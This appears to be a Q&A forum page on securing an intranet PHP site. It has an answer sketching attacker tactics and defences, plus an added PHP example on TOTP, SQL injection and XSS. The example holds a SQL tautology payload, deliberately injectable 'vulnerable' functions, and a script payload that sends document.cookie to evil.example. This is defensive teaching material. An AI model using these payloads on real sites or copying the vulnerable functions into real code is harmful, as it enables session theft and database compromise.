PHP - Security what is best way?

Backend · unresolved · 6 · 799
无人及你
无人及你 2021-02-06 09:24

What is the best way to secure an intranet website developed using PHP from outside attacks?

6 answers
  •  有刺的猬
    2021-02-06 09:49

    That's a stunningly thought-provoking question, and I'm surprised that you haven't received better answers.

    Summary

    Everything you would do for an external-facing application, and then some.

    Thought Process

    If I'm understanding you correctly, then you are asking a question which very few developers are asking themselves. Most companies have poor defence in depth, and once an attacker is in, he's in. Clearly you want to take it up a level.

    So, what kind of attack are we thinking about?
    If I'm the attacker and I'm attacking your intranet application, then I must have got access to your network somehow. This may not be as difficult as it sounds - I might try spearphishing (targeting email to individuals in your organisation, containing either malware attachments or links to sites which install malware) to get a trojan installed on an internal machine.

    Once I've done this (and got control of an internal PC), I'll try all the same attacks I would try against any internet application.

    However, that's not the end of the story. I've got more options: if I've got one of your user's PCs, then I might well be able to use a keylogger to gather usernames and passwords, as well as watching all your email for names and phone numbers.
    Armed with these, I may be able to log into your application directly. I may even learn an admin username/password. Even if I don't, a list of names and phone numbers along with a feel for company lingo gives me a decent shot at socially engineering my way into wider access within your company.

    Recommendations

    • First and foremost, before all technical solutions: TRAIN YOUR USERS IN SECURITY

    The common answers to securing a web app:

    • Use multi-factor authentication
      • e.g. username/password and some kind of pseudo-random number gadget.
    • Sanitise all your input.
      • to protect against cross-site scripting and SQL injection.
    • Use SSL (otherwise known as HTTPS).
      • this is a pain to set up (EDIT: actually that's improving), but it makes for much better security.
    • Adhere to the principles of "Segregation of Duties" and "Least Privilege"
      • In other words, by ensuring that all users have only the permissions they need to do their jobs (and nobody else's jobs) you make sure they have the absolute minimum ability to do damage.
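
The three code-level items in the list above (a second factor, SQL injection, cross-site scripting) worked through in PHP, as an added example that is not part of the original answer. It assumes PDO with the SQLite driver so it runs offline; the `users` table, its two rows, the attacker inputs and every function name are constructed for the example. The TOTP routine follows RFC 6238 (HMAC-SHA1, 30-second step) and is exercised against the RFC's Appendix B test secret. One practitioner caveat on the "sanitise all your input" item: the injection and XSS fixes shown here work at the query boundary (prepared statements) and the output boundary (context-aware encoding), which is what actually holds up, rather than by trying to rewrite input into something safe.

```php
<?php
declare(strict_types=1);
// Added example, not code from the original answer. Shows three list items in
// PHP: a TOTP second factor, SQL injection handled with a prepared statement,
// and XSS handled with output encoding. The in-memory SQLite table, sample
// users, attacker inputs and function names are all constructed here.

// --- Multi-factor authentication: RFC 6238 TOTP -----------------------------
// The "pseudo-random number gadget" is usually a TOTP app or hardware token.
function totp(string $secret, int $time, int $step = 30, int $digits = 6): string {
    $counter = pack('J', intdiv($time, $step));          // 64-bit big-endian step counter
    $hmac = hash_hmac('sha1', $counter, $secret, true);  // raw 20-byte HMAC-SHA1
    $offset = ord($hmac[19]) & 0x0f;                     // dynamic truncation (RFC 4226)
    $binary = ((ord($hmac[$offset]) & 0x7f) << 24)
            | (ord($hmac[$offset + 1]) << 16)
            | (ord($hmac[$offset + 2]) << 8)
            | ord($hmac[$offset + 3]);
    return str_pad((string)($binary % (10 ** $digits)), $digits, '0', STR_PAD_LEFT);
}

// Accept the current step and one step either side to tolerate clock drift;
// hash_equals keeps the comparison constant-time.
function verifyTotp(string $secret, string $submitted, int $now): bool {
    foreach ([-1, 0, 1] as $drift) {
        if (hash_equals(totp($secret, $now + 30 * $drift), $submitted)) {
            return true;
        }
    }
    return false;
}

// --- SQL injection ------------------------------------------------------------
// VULNERABLE: the quote in user input closes the string literal, and the rest
// of the input becomes part of the WHERE clause.
function findUserVulnerable(PDO $db, string $name): array {
    $sql = "SELECT name, role FROM users WHERE name = '$name'";
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// HARDENED: a prepared statement sends the value separately from the query
// text, so the quote is just data.
function findUserSafe(PDO $db, string $name): array {
    $stmt = $db->prepare('SELECT name, role FROM users WHERE name = :name');
    $stmt->execute([':name' => $name]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// --- Cross-site scripting ----------------------------------------------------
// VULNERABLE: user text is dropped straight into the HTML body.
function renderCommentVulnerable(string $comment): string {
    return "<p class=\"comment\">$comment</p>";
}

// HARDENED: encode for the HTML context at output time. ENT_QUOTES also covers
// attribute values; the explicit charset prevents multibyte encoding tricks.
function renderCommentSafe(string $comment): string {
    return '<p class="comment">'
        . htmlspecialchars($comment, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8')
        . '</p>';
}

// --- Demonstration ------------------------------------------------------------
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT NOT NULL, role TEXT NOT NULL)');
$db->exec("INSERT INTO users (name, role) VALUES ('alice', 'admin'), ('bob', 'staff')");

$attackerName    = "x' OR '1'='1";  // constructed tautology payload
$attackerComment = '<script>fetch("http://evil.example/?c=" + document.cookie)</script>';

printf("concatenated query matched %d user(s)\n", count(findUserVulnerable($db, $attackerName)));
printf("prepared query matched %d user(s)\n", count(findUserSafe($db, $attackerName)));
echo renderCommentVulnerable($attackerComment), "\n";
echo renderCommentSafe($attackerComment), "\n";

// RFC 6238 Appendix B test secret; the RFC lists 94287082 as the 8-digit code
// for this secret at t=59, of which the 6-digit form is the last six digits.
$seed = '12345678901234567890';
$code = totp($seed, 59);
printf("TOTP at t=59: %s, verifies: %s\n", $code, verifyTotp($seed, $code, 59) ? 'yes' : 'no');
```

Run it with `php example.php`. In a real application the TOTP seed is generated per user with `random_bytes()`, stored server-side, shown to the user once for enrolment and never logged; the drift window should be kept narrow and a used code should not be accepted twice within the same step.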
